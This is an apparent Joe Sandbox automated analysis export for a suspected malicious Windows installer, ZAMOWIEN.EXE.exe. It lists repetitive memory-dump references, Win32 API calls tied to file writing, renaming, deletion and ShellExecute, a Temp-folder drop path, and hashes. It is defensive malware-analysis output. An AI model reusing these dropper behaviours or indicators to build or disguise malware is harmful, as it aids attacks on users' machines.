                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings
                                                            • API String ID: 123533781-2378692180
                                                            • Opcode ID: c77c627256e4bda623a607ad17dfcbd8b79a5f4efbd0feb83fcc0e8782cebc3e
                                                            • Instruction ID: f40fdd2f837a9ef4581bc193a6a0bea3429b4c51dfd852c6190c3096ceffc06e
                                                            • Opcode Fuzzy Hash: c77c627256e4bda623a607ad17dfcbd8b79a5f4efbd0feb83fcc0e8782cebc3e
                                                            • Instruction Fuzzy Hash: 86415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: f02487b22387b853085197b61f410210571262e4d5166eebce8e800da2d9cfa3
                                                            • Instruction ID: ad23281ba59b28ec3aa51a9822d84a42962ca700f092f657026e1e1555a452f0
                                                            • Opcode Fuzzy Hash: f02487b22387b853085197b61f410210571262e4d5166eebce8e800da2d9cfa3
                                                            • Instruction Fuzzy Hash: D4F0A0326041149AD700E7B4A949AEEB778CB15324F20467FE101E20C2C6B86A859A2E
                                                            APIs
                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404060
                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404074
                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404092
                                                            • GetSysColor.USER32(?), ref: 004040A3
                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040B2
                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040C1
                                                            • lstrlenA.KERNEL32(?), ref: 004040C4
                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040D3
                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E8
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040414A
                                                            • SendMessageA.USER32(00000000), ref: 0040414D
                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404178
                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B8
                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004041C7
                                                            • SetCursor.USER32(00000000), ref: 004041D0
                                                            • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041E3
                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004041F0
                                                            • SetCursor.USER32(00000000), ref: 004041F3
                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421F
                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: N$open
                                                            • API String ID: 3615053054-904208323
                                                            • Opcode ID: 24a3c567e4c84230fd41fb35f41233bf1bdda571fe68e404e5e161a7314289a5
                                                            • Instruction ID: 69fd0845c5ba256ccbe239c9b2496b6d41a869ab2d6211be43361ce6884a8d21
                                                            • Opcode Fuzzy Hash: 24a3c567e4c84230fd41fb35f41233bf1bdda571fe68e404e5e161a7314289a5
                                                            • Instruction Fuzzy Hash: 4261E6B1A40205BFEB109F61CD45F6A3B69FB84741F10856AFB00BB2D1C7B8A951CB99
                                                            APIs
                                                            • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058B2
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058D6
                                                            • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DF
                                                              • Part of subcall function 0040578F: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                              • Part of subcall function 0040578F: lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                            • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058FC
                                                            • wsprintfA.USER32 ref: 0040591A
                                                            • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?,?,?,?,?), ref: 00405955
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405964
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040597E
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059AE
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A04
                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A16
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405A1D
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A24
                                                              • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 0040582E
                                                              • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                            • String ID: %s=%s$NUL$[Rename]
                                                            • API String ID: 3756836283-4148678300
                                                            • Opcode ID: d946d110d4bf28684a0750fc08e1c9afd0e6d677c24940f4a1bb09c316c960a0
                                                            • Instruction ID: b634479a22e8deba9b5d3b544f15de7451186434928a8d52e653b83d4df64d8e
                                                            • Opcode Fuzzy Hash: d946d110d4bf28684a0750fc08e1c9afd0e6d677c24940f4a1bb09c316c960a0
                                                            • Instruction Fuzzy Hash: 1B411671704B05AFD2206B249C89F6B7A5CEF85715F14053AFE02F62D2E67CA8018EBD
                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                                            • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                                            • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                                            • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                                            APIs
                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E3F
                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E51
                                                            • CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030C7,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405E61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                            • API String ID: 589700163-3429502937
                                                            • Opcode ID: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                                            • Instruction ID: bb0259e4d3285964694be274da6e12c2e2bd34974b8553a87efbf76dbfb260e1
                                                            • Opcode Fuzzy Hash: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                                            • Instruction Fuzzy Hash: 01110872808B9129EB3217248C44B777F89CB9A760F18047BE5D5722C2D67C5E828AED
                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F10
                                                            • GetSysColor.USER32(00000000), ref: 00403F2C
                                                            • SetTextColor.GDI32(?,00000000), ref: 00403F38
                                                            • SetBkMode.GDI32(?,?), ref: 00403F44
                                                            • GetSysColor.USER32(?), ref: 00403F57
                                                            • SetBkColor.GDI32(?,?), ref: 00403F67
                                                            • DeleteObject.GDI32(?), ref: 00403F81
                                                            • CreateBrushIndirect.GDI32(?), ref: 00403F8B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                            • Instruction ID: 89798723a00c12270f90293d7c2ee841fba0b57e24c86d845a8f250d462b8669
                                                            • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                            • Instruction Fuzzy Hash: 4A21C671904745AFCB209F28DD08B4BBFF8AF00705F048A2AF895E22E0C338E904CB55
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                                            • GlobalFree.KERNEL32(?), ref: 00402736
                                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                            • String ID:
                                                            • API String ID: 3294113728-0
                                                            • Opcode ID: bbfa500a578b54033b7ab03b93d607d7ad8d2c5a9459e93bcda8e1b4c888e2ba
                                                            • Instruction ID: b29e7b02db8965bff02c30d98d98e41c2d838b3f9629b7f5fdf8e259299dfe7b
                                                            • Opcode Fuzzy Hash: bbfa500a578b54033b7ab03b93d607d7ad8d2c5a9459e93bcda8e1b4c888e2ba
                                                            • Instruction Fuzzy Hash: 37319171C00128BBCF216FA5DD89DAE7E79EF05364F10423AF510762E1C7791D408BA9
                                                            APIs
                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476F
                                                            • GetMessagePos.USER32 ref: 00404777
                                                            • ScreenToClient.USER32(?,?), ref: 00404791
                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A3
                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                            • Instruction ID: e12531cc2cbda9362446d3482c890d37ab0b9233c447bf2f23075c067c261130
                                                            • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                            • Instruction Fuzzy Hash: 98014075D00219BAEB11DBA4DC45BFEBBBCAB55711F10412BBA10B71C0C7B465418BA5
                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                                            • MulDiv.KERNEL32(0006F547,00000064,0006F54B), ref: 00402B92
                                                            • wsprintfA.USER32 ref: 00402BA2
                                                            • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402B9C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
